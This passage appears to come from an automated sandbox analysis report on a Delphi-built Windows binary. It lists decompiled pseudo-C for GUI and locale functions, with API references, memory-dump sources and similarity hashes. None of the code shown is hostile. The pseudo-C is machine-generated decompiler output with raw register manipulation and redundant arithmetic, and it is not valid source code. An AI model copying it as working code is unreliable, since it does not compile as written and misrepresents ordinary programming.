				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x48fa28 == 0) {
					return _v5;
				} else {
					_push(0);
					L00406E30();
					_v12 = __eax;
					_push(_t32);
					_push(0x420d1a);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00406B00();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x48fa28; // 0x7b0807a3
						_push(_t18);
						L00406B28();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x48fa28; // 0x7b0807a3
						_push(_t21);
						L00406B28();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x420d21);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407090();
					return _t16;
				}
			}

0x00420c95
0x00420c97
0x00420c9d
0x00420ca8
0x00420d28
0x00420caa
0x00420caa
0x00420cac
0x00420cb1
0x00420cb6
0x00420cb7
0x00420cbc
0x00420cbf
0x00420cc2
0x00420cc4
0x00420cc7
0x00420cc8
0x00420cd0
0x00420cd5
0x00420cd6
0x00420cd8
0x00420cda
0x00420cdf
0x00420ce0
0x00420ced
0x00420cee
0x00420cf0
0x00420cf2
0x00420cf7
0x00420cf8
0x00420cfd
0x00420cfd
0x00420d03
0x00420d06
0x00420d09
0x00420d0e
0x00420d11
0x00420d12
0x00420d14
0x00420d19
0x00420d19

APIs

72E7AC50.USER32(00000000), ref: 00420CAC
72E7AD70.GDI32(?,00000068,00000000,00420D1A,?,00000000), ref: 00420CC8
72E7AEA0.GDI32(7B0807A3,00000000,00000008,?,?,00000068,00000000,00420D1A,?,00000000), ref: 00420CE0
72E7AEA0.GDI32(7B0807A3,00000008,00000008,?,7B0807A3,00000000,00000008,?,?,00000068,00000000,00420D1A,?,00000000), ref: 00420CF8
72E7B380.USER32(00000000,?,00420D21,00420D1A,?,00000000), ref: 00420D14

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B380
String ID:
API String ID: 120756276-0
Opcode ID: 7285d006103e8762a371f6ad121e6c0eee99bd92478656d37f109c53cece12f1
Instruction ID: 52804b6895c4163ca8fad93a2bbf2a68bdd42c7b971f1a4924c37c131778009b
Opcode Fuzzy Hash: 7285d006103e8762a371f6ad121e6c0eee99bd92478656d37f109c53cece12f1
Instruction Fuzzy Hash: 731108717483046EFB00DBE5AC42F6D7BE8E709714F50846BF504EA1C2D97AA444C328

Uniqueness

Uniqueness Score: -1.00%

Function 00465630, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00465630(int __eax) {
				int _v8;
				int _t20;
				int _t22;
				intOrPtr _t29;
				int _t32;
				intOrPtr _t34;
				intOrPtr _t36;

				_t34 = _t36;
				_t22 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_push(0);
					L00406E30();
					_v8 = __eax;
					_push(_t34);
					_push(0x4656b5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t36;
					_push(0x48);
					_t11 = _v8;
					L00406B00();
					_t32 = MulDiv(E0041F250( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
					 *(_t22 + 0x2b0) = _t32;
					E0046302C(_t22, MulDiv(_t32, 0x78, 0x64));
					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
					_t29 = 0x5a;
					 *[fs:eax] = _t29;
					_push(0x4656bc);
					_t20 = _v8;
					_push(_t20);
					_push(0);
					L00407090();
					return _t20;
				}
			}

0x00465631
0x00465636
0x0046563f
0x004656c0
0x00465641
0x00465641
0x00465643
0x00465648
0x0046564d
0x0046564e
0x00465653
0x00465656
0x00465659
0x0046565d
0x00465661
0x00465675
0x00465677
0x0046568b
0x00465696
0x0046569e
0x004656a1
0x004656a4
0x004656a9
0x004656ac
0x004656ad
0x004656af
0x004656b4
0x004656b4

APIs

72E7AC50.USER32(00000000), ref: 00465643
72E7AD70.GDI32(?,0000005A,00000048,00000000,004656B5,?,00000000), ref: 00465661

Part of subcall function 0041F250: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F261

MulDiv.KERNEL32(00000000,00000000,?), ref: 00465670
MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00465682
72E7B380.USER32(00000000,?,004656BC,00000000,00000000,?,0000005A,00000048,00000000,004656B5,?,00000000), ref: 004656AF

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B380
String ID:
API String ID: 120756276-0
Opcode ID: 0773beaff56a00405a6ce37e26b55d55c8904379294a987569536c747724b5cc
Instruction ID: bba66407a661a9468b9e2c443340a47881f8a997fcb6e2684ea967df43eb7c98
Opcode Fuzzy Hash: 0773beaff56a00405a6ce37e26b55d55c8904379294a987569536c747724b5cc
Instruction Fuzzy Hash: FA019EB16457006FE700EB75CC46B9A379CDB04714F5100BAFA08EB282EA79AD10C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00409BC8, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409BC8(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409c5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409940(GetThreadLocale(), 0x409c74, 0x100b,  &_v8);
				_t29 = E00408740(0x409c74, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409B14, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x48f81c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409B50, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409C66);
				return E00404320( &_v8);
			}

0x00409bc8
0x00409bcb
0x00409bd0
0x00409bd1
0x00409bd6
0x00409bd9
0x00409bef
0x00409c01
0x00409c0b
0x00409c1b
0x00409c20
0x00409c25
0x00409c2a
0x00409c2a
0x00409c30
0x00409c33
0x00409c33
0x00409c44
0x00409c44
0x00409c4b
0x00409c4e
0x00409c51
0x00409c5e

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C5F,?,?,00000000), ref: 00409BE0

Part of subcall function 00409940: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409C5F,?,?,00000000), ref: 00409C10
EnumCalendarInfoA.KERNEL32(Function_00009B14,00000000,00000000,00000004), ref: 00409C1B
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409C5F,?,?,00000000), ref: 00409C39
EnumCalendarInfoA.KERNEL32(Function_00009B50,00000000,00000000,00000003), ref: 00409C44

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: b2756358729dd665ab0e9078135860df9401318f844570c34617808faf33e4a2
Instruction ID: 2b6b9a13bd52422c50fd17bad9aef40bb10e6f1d50514e1c8a39be3191c5ba77
Opcode Fuzzy Hash: b2756358729dd665ab0e9078135860df9401318f844570c34617808faf33e4a2
Instruction Fuzzy Hash: 8E01F2B1A042046BE701B6719D12F5E769CDB46728F61453AF501F6AD6D63CAE0082AC

Uniqueness

Uniqueness Score: -1.00%

Function 004575E4, Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004575E4() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x48fc14 != 0) {
					_t10 =  *0x48fc14; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x48fc14 = 0;
				if( *0x48fc18 != 0) {
					_t2 =  *0x48fc10; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x48fc0c) {
						_t8 =  *0x48fc18; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x48fc18; // 0x0
					CloseHandle(_t5);
					 *0x48fc18 = 0;
					return 0;
				}
				return 0;
			}

0x004575eb
0x004575ed
0x004575f3
0x004575f3
0x004575fa
0x00457606
0x00457608
0x0045760e
0x0045761e
0x00457622
0x00457628
0x00457628
0x0045762d
0x00457633
0x0045763a
0x00000000
0x0045763a
0x0045763f

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 004575F3
SetEvent.KERNEL32(00000000,0045988E,00000000,0045896B,?,?,00470838,00000001,00458A2B,?,?,?,00470838), ref: 0045760E
GetCurrentThreadId.KERNEL32 ref: 00457613
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045988E,00000000,0045896B,?,?,00470838,00000001,00458A2B,?,?,?,00470838), ref: 00457628
CloseHandle.KERNEL32(00000000,00000000,0045988E,00000000,0045896B,?,?,00470838,00000001,00458A2B,?,?,?,00470838), ref: 00457633

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 0c9ef34d10a3a34b17f2100b8d050073e33169a6789e8e556c5fa634041fb279
Instruction ID: 428989214356fa18dd56e1ff7b8efdf93b46b12994d6f35e9dabfcb500aced92
Opcode Fuzzy Hash: 0c9ef34d10a3a34b17f2100b8d050073e33169a6789e8e556c5fa634041fb279
Instruction Fuzzy Hash: B1F0F8B15041089AC700FB7EFE49A0E3298B705315B100D3EAA11D72E1CE3896E9CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00459A5C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00459A5C(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44fb00; // 0x44fb04
				E00404CFC( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x459e07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044FEB8() == 0 || E0045745C(E00437568( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E00459870( *_t262);
					} else {
						E00459678( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E004598A8();
					_v84 = E00456820();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E0043865C( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x434e14; // 0x434e60
						_t171 = E00403740(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E00438800( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00457424( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E00435DF0(_v148,  &_v140,  &_v144, _t333);
					E004043B8( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x471b14; // 0x4354a8
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00439EA4( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E004599FC(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037B0( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E00420080( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E00420080( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E004387D4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E004387D4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E00438E5C( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00457570(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00459678( *_t262, 1, _v48);
						} else {
							E00459678( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x459e0e);
						E00404344( &_v148, 2);
						_t284 =  *0x44fb00; // 0x44fb04
						return E00404DCC( &_v100, _t284);
					}
				}
			}

0x00459a5d
0x00459a6a
0x00459a70
0x00459a7b
0x00459a7c
0x00459a7d
0x00459a83
0x00459a89
0x00459a8e
0x00459a93
0x00459a94
0x00459a99
0x00459a9c
0x00459aa1
0x00459aae
0x00459dc0
0x00459dc0
0x00459dc3
0x00459dc5
0x00459dd6
0x00459dc7
0x00459dcd
0x00459dcd
0x00000000
0x00459ae7
0x00459aec
0x00459af2
0x00459af8
0x00459b00
0x00459b0d
0x00459b15
0x00459b20
0x00459b2b
0x00459b2c
0x00459b2d
0x00459b2e
0x00459b39
0x00459b3e
0x00459b43
0x00459b4b
0x00459b4e
0x00459b50
0x00459b60
0x00459b65
0x00459b6b
0x00459b70
0x00459b72
0x00459b74
0x00459b7b
0x00459b88
0x00459b88
0x00459b7b
0x00459b52
0x00459b59
0x00459b59
0x00459b9f
0x00459bb2
0x00459bbd
0x00459bc6
0x00459bd4
0x00459be5
0x00459bf3
0x00459bfa
0x00459c02
0x00459c05
0x00459c0a
0x00459c0f
0x00459c29
0x00459c31
0x00459c51
0x00459c51
0x00459c5b
0x00459c65
0x00459c69
0x00459c69
0x00459c69
0x00459c6b
0x00459c6d
0x00459c76
0x00000000
0x00459c7c
0x00459c7c
0x00459c80
0x00000000
0x00000000
0x00459c8a
0x00459ca2
0x00459cbd
0x00459ccf
0x00459ce7
0x00459d02
0x00459d1e
0x00459d1e
0x00459d2f
0x00459d34
0x00459d3c
0x00459d45
0x00459d56
0x00459d5b
0x00459d63
0x00459d6c
0x00459d7a
0x00459d93
0x00459d99
0x00459d9e
0x00459da3
0x00459db9
0x00459da5
0x00459dab
0x00459dab
0x00459ddb
0x00459ddd
0x00459de0
0x00459de3
0x00459df3
0x00459dfb
0x00459e06
0x00459e06
0x00459c76

APIs

Part of subcall function 0044FEB8: GetActiveWindow.USER32 ref: 0044FEBB
Part of subcall function 0044FEB8: GetCurrentThreadId.KERNEL32 ref: 0044FED0
Part of subcall function 0044FEB8: 72E7AC10.USER32(00000000,0044FE98), ref: 0044FED6

Part of subcall function 004598A8: GetCursor.USER32(?), ref: 004598C3
Part of subcall function 004598A8: GetIconInfo.USER32(00000000,?), ref: 004598C9

ClientToScreen.USER32(?,?), ref: 00459B88
OffsetRect.USER32(?,?,?), ref: 00459B9F
OffsetRect.USER32(?,?,?), ref: 00459CCF

Part of subcall function 00459678: SetTimer.USER32(00000000,00000000,?,0045747C), ref: 00459692

Strings

`NC, xrefs: 00459B65

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
String ID: `NC
API String ID: 3022406661-918118547
Opcode ID: b6f56a5278e326f233595b3ba09ef6aea8ef7f0135572a85e330dfade3806389
Instruction ID: f53a5582f4b0aa71572237dcaa714d8be12822c38cb9570800d0a0e6945ada50
Opcode Fuzzy Hash: b6f56a5278e326f233595b3ba09ef6aea8ef7f0135572a85e330dfade3806389
Instruction Fuzzy Hash: FDD1D275A00618CFCB00DFA8C884A9AB7F5BF49304F1581AAE905EB366DB34AD49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00443660, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00443660(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x443a38);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(_t126 == 0) {
						E00407260( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E004420EC(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E0043751C();
									E004399F0( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x443a3f);
						return E00404320( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E0043865C(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E00438CBC(_t300,  &_v76);
								E00404374( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E00404320( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E00443544(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E00443090(_v8, __eflags);
					} else {
						E00407260( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E004420EC(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x44e7cc; // 0x44e818
								_t186 = E00403740( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E00438BDC(_t295, 0);
								} else {
									E00455680(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E00438800( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E0043F370( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E0043DF04( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E004420EC(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x48e838; // 0x48fc00
					SetCursor(E00456D18( *_t209,  *((short*)(0x4719f4 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E00443144(_v8);
						E00407260( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004435CC(_t306);
						E00443144(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00407260( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E004420EC(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E0043F370( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x434e14; // 0x434e60
							_t236 = E00403740( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc0))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E00439364(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00443030(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}

0x00443660
0x00443661
0x0044366b
0x0044366e
0x00443670
0x00443675
0x00443676
0x0044367b
0x0044367e
0x00443681
0x00443683
0x00443688
0x004436ac
0x004436ac
0x004436b1
0x00443732
0x00443745
0x00443747
0x00443749
0x0044374f
0x00443753
0x00443759
0x0044375d
0x00443763
0x00443771
0x00443771
0x0044375d
0x00443753
0x00443a0d
0x00443a15
0x00443a1f
0x00443a1f
0x00443a22
0x00443a24
0x00443a27
0x00443a2a
0x00443a37
0x00443a37
0x004436b3
